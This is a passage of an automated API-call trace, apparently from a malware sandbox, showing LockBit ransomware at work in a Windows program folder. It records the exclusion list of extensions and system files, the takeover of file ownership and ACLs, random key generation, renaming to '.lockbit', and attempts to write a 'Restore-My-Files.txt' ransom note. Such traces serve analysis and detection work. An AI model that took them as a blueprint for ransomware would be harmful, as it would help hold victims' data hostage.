[0086.088] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0086.089] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0086.089] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0086.089] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_specialocc_Thumbnail.bmp") returned 1 [0086.090] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0086.090] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0086.090] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0086.090] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0086.090] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_specialocc_Thumbnail.bmp") returned 1 [0086.090] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0086.090] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0086.090] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp") returned=".bmp" [0086.090] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0086.090] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0086.090] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0086.091] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0086.091] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp.lockbit") returned 87 [0086.091] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.092] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.092] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.092] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.093] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.093] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.093] RtlFreeAnsiString (AnsiString="\\") [0086.093] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0086.093] malloc (_Size=0x200) returned 0x77d800 [0086.093] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0086.093] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.093] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.093] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.094] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.094] CloseHandle (hObject=0x3bc) returned 1 [0086.094] free (_Block=0x77d800) [0086.094] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0086.095] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.095] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.095] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0086.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.096] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.096] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.103] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.103] malloc (_Size=0xc4) returned 0x1ff1e60 [0086.103] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0086.103] free (_Block=0x1ff1e60) [0086.103] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.103] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.103] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.103] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_travel_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0086.103] lstrcmpiW (lpString1=".", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0086.103] lstrcmpiW (lpString1="..", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0086.103] PathFindExtensionW (pszPath="rectangle_travel_Thumbnail.bmp") returned=".bmp" [0086.103] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0086.103] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0086.103] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0086.103] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0086.104] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0086.104] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0086.104] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0086.104] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0086.104] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_travel_Thumbnail.bmp") returned 1 [0086.105] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0086.105] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0086.105] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0086.105] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0086.105] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_travel_Thumbnail.bmp") returned 1 [0086.105] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0086.105] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0086.105] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp") returned=".bmp" [0086.105] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0086.105] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0086.106] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0086.106] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0086.106] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp.lockbit") returned 83 [0086.106] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.107] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.107] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.107] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.107] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.108] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.108] RtlFreeAnsiString (AnsiString="\\") [0086.108] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0086.108] malloc (_Size=0x200) returned 0x77d800 [0086.108] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0086.108] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.108] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.108] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.108] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.109] CloseHandle (hObject=0x3bc) returned 1 [0086.109] free (_Block=0x77d800) [0086.109] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0086.109] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.109] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.109] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0086.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.110] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.116] malloc (_Size=0xbc) returned 0x1ff1e60 [0086.116] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xbc, FileInformationClass=0xa) returned 0xc0000008 [0086.116] free (_Block=0x1ff1e60) [0086.116] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.117] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.117] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.117] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_widescreen_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0086.117] lstrcmpiW (lpString1=".", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0086.117] lstrcmpiW (lpString1="..", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0086.117] PathFindExtensionW (pszPath="rectangle_widescreen_Thumbnail.bmp") returned=".bmp" [0086.117] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0086.117] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0086.117] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0086.117] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0086.117] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0086.118] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW 